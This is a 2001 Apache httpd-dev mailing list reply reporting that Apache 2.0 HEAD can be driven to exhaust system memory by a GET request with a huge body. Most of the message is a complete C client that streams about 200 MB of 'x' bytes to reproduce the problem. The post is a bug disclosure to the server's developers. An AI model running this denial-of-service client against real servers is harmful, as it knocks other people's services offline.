httpd-dev mailing list archives

From Jon Travis <jtra...@covalent.net>
Subject Re: More DoS -- Large GETs
Date Tue, 30 Oct 2001 23:48:48 GMT
On Tue, Oct 30, 2001 at 03:46:14PM -0500, Jeff Trawick wrote:
> Jon Travis <jtravis@covalent.net> writes:
> 
> > It's possible to make Apache eat up all available memory on a system
> > by sending a GET with a large Content-Length (like several hundred MB),
> > and then sending that content.  This is as of HEAD about 5 minutes ago.
> 
> Maybe the problem is your client implementation?  You didn't by any
> chance allocate a mongo buffer to hold the request body, did you?
> 
> I just sent a GET w/ 500,000,000-byte body and didn't suffer.
> 
> strace showed that the server process was pulling in 8K at a time...  lots
> of CPU between client and server but no swap fest.

Nope.  I just allocated 1MB of 'x's and sent that buffer a couple hundred
times.  It was the httpd process which was growing, not my test program.
This was with Apache 2.0 HEAD, BTW, and 100% reproducible for me.
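
A minimal client along these lines is enough to show the pattern I mean:
send a GET with a very large Content-Length, then stream a 1MB buffer of
'x's a couple hundred times.  This is only a rough sketch; the host, port,
and request path are placeholders, not the exact values from my setup.

/* rough sketch of a large-GET test client; host/port/path are placeholders */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>

#define CHUNK   (1024 * 1024)   /* 1 MB of 'x's per write */
#define REPEATS 200             /* ~200 MB request body total */

int main(void)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa;
    char hdr[256];
    char *buf = malloc(CHUNK);
    int i;

    if (fd < 0 || buf == NULL)
        return 1;
    memset(buf, 'x', CHUNK);

    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(80);                       /* placeholder port */
    sa.sin_addr.s_addr = inet_addr("127.0.0.1");   /* placeholder host */
    if (connect(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0)
        return 1;

    /* GET with a body: the large Content-Length is what makes the
       server read the request body */
    snprintf(hdr, sizeof(hdr),
             "GET / HTTP/1.1\r\n"
             "Host: localhost\r\n"
             "Content-Length: %ld\r\n"
             "Connection: close\r\n"
             "\r\n", (long)CHUNK * REPEATS);
    write(fd, hdr, strlen(hdr));

    /* stream the body; short writes ignored for brevity */
    for (i = 0; i < REPEATS; i++)
        if (write(fd, buf, CHUNK) < 0)
            break;

    close(fd);
    free(buf);
    return 0;
}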

-- Jon

